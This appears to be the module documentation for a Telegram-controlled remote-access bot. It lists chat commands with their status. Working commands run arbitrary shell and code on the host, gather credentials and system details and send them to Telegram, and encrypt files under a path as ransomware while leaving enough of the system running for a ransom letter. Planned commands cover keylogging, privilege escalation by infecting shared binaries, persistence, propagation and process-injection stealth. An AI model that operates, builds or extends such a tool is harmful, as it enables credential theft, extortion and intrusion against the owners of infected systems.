This is the documentation of the included by default modules. You can rule your own if you know how to code in any of the supported languages.
Blocks like this represents what you would usually write on Telegram chat
Login using the bot password in the password.txt file allowing you to run privileged commands/modules
WORKING
/login thisismypassword
Backup the selected path allowing you to chose between different levels of compression, password encryption. Gives you a link to the uploaded files
Not Working/In Current Development
/backup /home/documents/ 11
Run C++ code and return the output to Telegram
Uses system installed g++ command
WORKING
/cpp #include <iostream>
int main() {
std::cout << "Hello!";
return 0;
}
Generates a PCAP network traffic capture and uploads it to Telegram
Not Developed yet
/dumpNetwork
Find multiple files that are holding sensitive information, creates a JSON and returns it to Telegram
WORKING
/findCredentials
Gathers information about the system. Public IP address, operative system version, kernel version, hardware, number of packages installed, etc. Returns the information to Telegram
WORKING
/getClientInfo
Run GoLang code and returns the output to Telegram
Uses system installed Go command
WORKING
/go package main
import "fmt"
func main() {
fmt.Println("Hello!")
}
Returns information about available modules to Telegram
WORKING
/help
Run Javascript code and return the output to Telegram
Uses system installed node command. It's not the same process as the Telegram bot
WORKING
/js console.log(new Date());
Captures keyboard keys and returns them to telegram after selected number of keys are captured
Not Developed Yet
/keylogger 1000
Run Lua code and return the output to Telegram
Uses system installed lua command
WORKING
/lua print("Hello")
Escalate privileges to root using a known exploit, or if there isn't an available vulnerability for the system, assist you on performing an advanced privilege escalation using social engineering (for example infecting shared binaries and waiting the root users starts a shell to get privileges)
Not Developed Yet
/pe
Get persistence on the system to make sure the bot keeps running even if removed, dependencies are removed or the process is killed
Not Developed Yet
/persistence
Try to propagate the bot to other systems, media storage, external devices or network devices
Not Developed Yet
/pivot
Run Python code and return the output to Telegram
Uses system installed python command
WORKING
/python print(f"""Hello!
How
Are
You?
""")
Encrypts all the files under indicated path, using a key derivation from your key and indicated compression strength. Some folders are ignored by default, so you don't break the system, the bot continues to work and the user can use the system to read the ransomware letter you send
- Brotli compression is used to improve times, reduce size and increasse security
- Known cryptography (aes 256 + camellia 256 + aes256, cbc with different IV) is used by default (OpenSSL implentations)
- Know key derivations (base64, sha512) are used by default
- Custom Xor encryption is added too (2 layers, using different key derivations) just as an extra. (I think i will help in case know vulnerabilities in OpenSSL arrives some day or to dificult a bit quantum computers job in cracking)
WORKING
/ransomware e password /home 1
/ransomware d password /home 1
Run commands in the system (in a default subshell) and return output to Telegram
WORKING
/run ls -la
Scan the local networks to find available services and devices and return result to Telegram
Not Developed Yet
/scanNetwork
Send an email using a free service
Not Developed Yet
/sendMail from@freeprovider.tld myPassword Hello Hey How are you doing? destination@example.com
Remove any traces of infection, injects itself into another procress memory, goes sleep for the time indicated, run the bot without dependecies, change the footprint
Not Developed Yet
/stealth 21h